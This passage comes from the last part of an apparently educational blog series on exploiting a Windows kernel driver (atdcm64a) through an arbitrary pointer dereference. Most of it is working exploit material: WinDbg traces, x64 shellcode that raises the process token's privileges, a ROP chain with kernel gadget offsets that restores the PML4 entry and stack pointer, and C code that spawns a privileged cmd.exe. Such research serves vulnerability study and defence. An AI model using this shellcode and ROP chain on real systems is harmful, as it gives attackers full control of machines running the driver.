 20 0x000000014 SeDebugPrivilege                  Attributes - Enabled 
 21 0x000000015 SeAuditPrivilege                  Attributes - Enabled 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - Enabled 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 25 0x000000019 SeUndockPrivilege                 Attributes - Enabled 
 28 0x00000001c SeManageVolumePrivilege           Attributes - Enabled 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 31 0x00000001f SeTrustedCredManAccessPrivilege   Attributes - Enabled 
 32 0x000000020 SeRelabelPrivilege                Attributes - Enabled 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - Enabled 
 34 0x000000022 SeTimeZonePrivilege               Attributes - Enabled 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - Enabled 
 36 0x000000024 SeDelegateSessionUserImpersonatePrivilege  Attributes - Enabled 
Authentication ID:         (0,5c94a)
Impersonation Level:       Anonymous
TokenType:                 Primary
[...]

Restoring execution

At this point we must find a way to restore the execution flow in order to not cause a BSOD after executing our shellcode. We have two options :

Executing a sysretinstruction. This is the couterpart of syscalland allows to transit from kernel-mode to user-mode.
Reset the stack pointer to the right location in the stack so that the execution flow gets restored from where it was hijacked.

I preferred to go with the second option as in my opinion it is cleaner and does not leave the memory in an inconsistent state.

The first option instead may, for example, cause memory leaks or leave some mutexes locked. This is because functions in the call stack won’t finish normally, which means resources acquired by the functions part of the call stack (locks, allocations in the pool…) may not be released.

We will also have to restore the PML4 entry to its original value, as I got some issues when our process tries to exit.

Retrieving the original value of the stack pointer

An easy way to retrieve the original value the stack pointer, before tampering it with the pivot gadget, is doing the following consideration:

The stack frames in the stack will have always the same size. If it is true then the offset between the initial stack pointer and the original stack pointer before the hijacking will always be the same.

Let’s verify this in WinDbg. Let’s put a breakpoint at atdcm64a+0x223f, that is where our vulnerable driver calls IofCallDriver():

1: kd> ba e 1 fffff800`2d9f223f
1: kd> g
Breakpoint 1 hit
atdcm64a+0x223f:
fffff800`2d9f223f ff15fb2d0000    call    qword ptr [atdcm64a+0x5040 (fffff800`2d9f5040)]
0: kd> t
nt!IofCallDriver:
fffff800`25cebea0 4883ec38        sub     rsp,38h
0: kd>

Let’s step until we reach jmp rax, inside nt!guard_dispatch_icall, the instruction that allows us to hijack the execution flow. Now, let’s inspect the call stack:

1: kd> p
nt!guard_dispatch_icall+0x71:
fffff800`25e21b01 ffe0            jmp     rax
1: kd> k
 # Child-SP          RetAddr               Call Site
00 ffffde08`f566f458 fffff800`25cebef5     nt!guard_dispatch_icall+0x71
01 ffffde08`f566f460 fffff800`2d9f2245     nt!IofCallDriver+0x55
02 ffffde08`f566f4a0 fffff800`2d9f16c3     atdcm64a+0x2245
03 ffffde08`f566f520 fffff800`25cebef5     atdcm64a+0x16c3
04 ffffde08`f566f720 fffff800`26140060     nt!IofCallDriver+0x55
05 ffffde08`f566f760 fffff800`26141a90     nt!IopSynchronousServiceTail+0x1d0
06 ffffde08`f566f810 fffff800`26141376     nt!IopXxxControlFile+0x700
07 ffffde08`f566fa00 fffff800`25e2bbe5     nt!NtDeviceIoControlFile+0x56
08 ffffde08`f566fa70 00007ff8`01b6f454     nt!KiSystemServiceCopyEnd+0x25
09 0000007c`fd2ffbb8 00007fff`ff27664b     0x00007ff8`01b6f454
0a 0000007c`fd2ffbc0 0000007c`fd2ffc30     0x00007fff`ff27664b
0b 0000007c`fd2ffbc8 0000007c`fd2ffc38     0x0000007c`fd2ffc30
0c 0000007c`fd2ffbd0 0000007c`fd2ffc40     0x0000007c`fd2ffc38
0d 0000007c`fd2ffbd8 00000000`00000000     0x0000007c`fd2ffc40

From the call stack we can see that after nt!guard_dispatch_icall the execution should return to 0xfffff80025cebef5 (first row in the call stack).

If we inspect the data stored in the stack, starting from RSP, we can see the return address is at address 0xffffde08f566f458 in the stack:

1: kd> dq @rsp
ffffde08`f566f458  fffff800`25cebef5 00000000`00000000
ffffde08`f566f468  fffff800`25cebea0 00000000`00000010
ffffde08`f566f478  00000000`00040304 ffffde08`f566f498
ffffde08`f566f488  00000000`00000018 ffffde08`f566f4a0
ffffde08`f566f498  fffff800`2d9f2245 0000001a`ff000000
ffffde08`f566f4a8  00000000`00000000 ffffe18f`323e500d
ffffde08`f566f4b8  fffff800`25dd763f 00000000`00000000
ffffde08`f566f4c8  ffffde08`f566f4f0 ffffde08`f566f4e0

Let’s also retrieve the _ETHREAD and _KTHREAD structs of our current thread:

1: kd> !thread
THREAD ffffe18f35335080  Cid 1304.08d4  Teb: 0000007cfd07a000 Win32Thread: 0000000000000000 RUNNING on processor 1
IRP List:
    ffffe18f36d48000: (0006,1360) Flags: 00060000  Mdl: 00000000
    ffffe18f34c31cd0: (0006,0118) Flags: 00060070  Mdl: 00000000
[...]
1: kd> dt nt!_ETHREAD  ffffe18f35335080 
   +0x000 Tcb              : _KTHREAD
   +0x480 CreateTime       : _LARGE_INTEGER 0x01dad54a`f0da9edd
[...]
1: kd> dx -id 0,0,ffffe18f36a840c0 -r1 (*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080))
(*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080))                 [Type: _KTHREAD]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] SListFaultAddress : 0x0 [Type: void *]
    [+0x020] QuantumTarget    : 0x79a5af2 [Type: unsigned __int64]
    [+0x028] InitialStack     : 0xffffde08f566fc70 [Type: void *]
    [+0x030] StackLimit       : 0xffffde08f566a000 [Type: void *]
    [+0x038] StackBase        : 0xffffde08f5670000 [Type: void *]
    [+0x040] ThreadLock       : 0x0 [Type: unsigned __int64]
[...]

Notice the value of InitialStack.

If we substract the current value of RSP from InitialStack we get 0x818 as offset value.

1: kd> ? 0xffffde08f566fc70-ffffde08`f566f458
Evaluate expression: 2072 = 00000000`00000818

If we repeat the same procedure after restarting the system we are going to notice the offset between RSP and InitialStack won’t change.

Therefore, in order to retrieve the original value of RSP, before tampering it with our pivot gadget, we can:

Retrieve the _KTHREAD structure of the current thread from the gs register.
Retrieve the value of InitialStack from _KTHREAD.
Substract 0x818 from InitialStack. The result of the substraction is the original value of rsp before tampering it.

Crafting the cleanup ROP chain

Now that we know how to retrieve the original value of RSP, we need to modify our shellcode and craft a cleanup ROP chain that will perform the following operations:

Restore the original value of the PML4 entry.
Restore the original value of RSP so that execution flow can proceed as it was supposed to before we hijacked it.

Here’s the final shellcode:

// storing in RCX original PML4E value
mov    rdx,rax
mov    rcx,QWORD PTR [rax]
bts    rcx,0x2
bts    rcx,0x3f

// increment privileges payload
xor    rax,rax
mov    rax,QWORD PTR gs:[rax+0x188]
mov    rax,QWORD PTR [rax+0xb8]
mov    r8,QWORD PTR [rax+0x4b8]
and    r8,0xfffffffffffffff0
movabs r9,0x1ff2ffffbc
mov    QWORD PTR [r8+0x40],r9
mov    QWORD PTR [r8+0x48],r9

// storing in cleanup ropchain original rsp value
xor    rax,rax
mov    rax,QWORD PTR gs:[rax+0x188]
mov    rax,QWORD PTR [rax+0x28]
sub    rax,0x818
mov    QWORD PTR [rsp+0x20],rax
mov    rax,rcx
ret

Before the increment privileges payload we perform the following operations:

Move the PML4E’s address in rdx.
Recompute the original PML4E value and store it in rcx.

After the increment privileges payload we perform the following operations:

Use rax in order to retrieve the InitialStack field from the current’s thread _KTHREAD structure.
Subtract offset 0x818 from rax in order to obtain the original rsp value.
Store the original rsp value in our cleanup rop chain with the QWORD PTR [rsp+0x20],rax instruction.
Move in rax the original value of the PML4E.

Here’s our cleanup ROP chain that is executed after the shellcode:

//<shellcode>
ropStack[index] = (ULONGLONG)sc; index++;

//<cleanup>
ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret;
ropStack[index] = g_ntbase + 0x3d4cba; index++; // xor rax, rax; ret;
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
ropStack[index] = g_ntbase + 0x20505a; index++; // pop rsp; ret;
ropStack[index] = 0x4141414141414141; index++; // filled with rsp value
//<cleanup>

In this final ROP chain we restore the PML4 entry value. Remember in the shellcode we end up saving the address of PML4E in rdx and the original value of PML4E in rax, and finally we pop in RSP the original value of the stack pointer before hijacking execution with the pivot gadget.

The value 0x4141414141414141 in the ROP chain is just a dummy value that is actually replaced with real value with theQWORD PTR [rsp+0x20],rax instruction, executed in our shellcode.

Getting a high-privileged shell

So, we are just left with spawning a cmd.exe at the end of our exploit, and if the ROP chain completes successfully we should get a shell with all privileges enabled. We can use the system() function at the end of our main() function in order to easily spawn a shell.

int main()
{
    [...]
    arbitraryCallDriver(outputBuffer, SIZE_BUF);
    printf("[+] arbitraryCallDriver returned successfully.\n");
    printf("[*] spawning system shell...\n");
    system("cmd.exe");
    return 0;
}

The full code of the exploit is available here on GitHub (master branch). At this point after compiling our exploit we should obtain a shell with all privileges enabled!

Conclusion

In this series of articles, I explained the process of finding vulnerabilities in kernel drivers using manual static analysis techniques and developing an exploit that takes advantage of an arbitrary pointer dereference.

Credits

Credits go to:

@ommadawn46, for his awesome article about how KVA works and how to bypass it.
Enrique Nissim and Nicolas Economou, for their research paper.
Alexandru Uifalvi and Morten Schenk for the exploit code.

In addition I would like to thank:

Cedric Halbronn for his amazing courses on OST2.
Connor Mcgarr and Paolo Stagno for their awesome blog posts on the topic.
Igor Skochinsky for the Igor’s tips on Hex-Rays (all I’ve learned about IDA Pro was thanks to his tips).

Contacts

If you have any questions, feel free to reach me at the following contacts: